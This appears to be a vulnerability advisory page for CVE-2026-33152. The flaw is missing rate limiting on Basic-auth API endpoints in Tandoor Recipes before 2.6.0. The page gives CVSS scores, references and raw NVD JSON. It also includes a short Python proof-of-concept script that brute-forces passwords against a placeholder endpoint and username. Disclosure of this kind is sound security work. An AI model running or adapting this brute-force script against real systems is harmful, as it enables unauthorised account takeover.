CVE-2026-33152

Description

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. In versions prior to 2.6.0, Tandoor Recipes configures Django REST Framework with BasicAuthentication as one of the default authentication backends. The AllAuth rate limiting configuration (ACCOUNT_RATE_LIMITS: login: 5/m/ip) only applies to the HTML-based login endpoint at /accounts/login/. Any API endpoint that accepts authenticated requests can be targeted via Authorization: Basic headers with zero rate limiting, zero account lockout, and unlimited attempts. An attacker can perform high-speed password guessing against any known username. Version 2.6.0 patches the issue.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:tandoor:recipes:*:*:*:*:*:*:*:* - VULNERABLE

Tandoor Recipes < 2.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import base64

# Target configuration
target_url = "http://target-ip/api/v1/protected-endpoint/"
target_username = "admin"
wordlist = ["password", "123456", "admin", "secret"]

print(f"Starting brute force attack against {target_username}...")

for password in wordlist:
    # Encode credentials to Base64 for Basic Auth
    credentials = f"{target_username}:{password}"
    b64_creds = base64.b64encode(credentials.encode()).decode()
    
    headers = {
        "Authorization": f"Basic {b64_creds}",
        "Content-Type": "application/json"
    }
    
    try:
        # Send request to API endpoint
        response = requests.get(target_url, headers=headers, timeout=5)
        
        # Check if authentication was successful
        if response.status_code == 200:
            print(f"[SUCCESS] Valid password found: {password}")
            break
        elif response.status_code == 401 or response.status_code == 403:
            print(f"[FAILED] Invalid password: {password}")
        else:
            print(f"[INFO] Received status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] Connection failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33152
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33152
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33152/
[4] VulDB https://vuldb.com/cve/CVE-2026-33152
[5] https://github.com/TandoorRecipes/recipes/releases/tag/2.6.0
[6] https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-7m7c-jjqc-r522

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33152", "sourceIdentifier": "[email protected]", "published": "2026-03-26T19:17:03.147", "lastModified": "2026-03-30T19:18:18.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. In versions prior to 2.6.0, Tandoor Recipes configures Django REST Framework with BasicAuthentication as one of the default authentication backends. The AllAuth rate limiting configuration (ACCOUNT_RATE_LIMITS: login: 5/m/ip) only applies to the HTML-based login endpoint at /accounts/login/. Any API endpoint that accepts authenticated requests can be targeted via Authorization: Basic headers with zero rate limiting, zero account lockout, and unlimited attempts. An attacker can perform high-speed password guessing against any known username. Version 2.6.0 patches the issue."}, {"lang": "es", "value": "Tandoor Recipes es una aplicación para gestionar recetas, planificar comidas y crear listas de compras. En versiones anteriores a la 2.6.0, Tandoor Recipes configura Django REST Framework con BasicAuthentication como uno de los backends de autenticación predeterminados. La configuración de limitación de tasa de AllAuth (ACCOUNT_RATE_LIMITS: login: 5/m/ip) solo se aplica al endpoint de inicio de sesión basado en HTML en /accounts/login/. Cualquier endpoint de API que acepte solicitudes autenticadas puede ser objetivo a través de encabezados Authorization: Basic sin limitación de tasa, sin bloqueo de cuenta y con intentos ilimitados. Un atacante puede realizar adivinación de contraseñas a alta velocidad contra cualquier nombre de usuario conocido. La versión 2.6.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tandoor:recipes:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.6.0", "matchCriteriaId": "6EFEDF7D-1D00-4901-A064-ECC168038F6C"}]}]}], "references": [{"url": "https://github.com/TandoorRecipes/recipes/releases/tag/2.6.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-7m7c-jjqc-r522", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}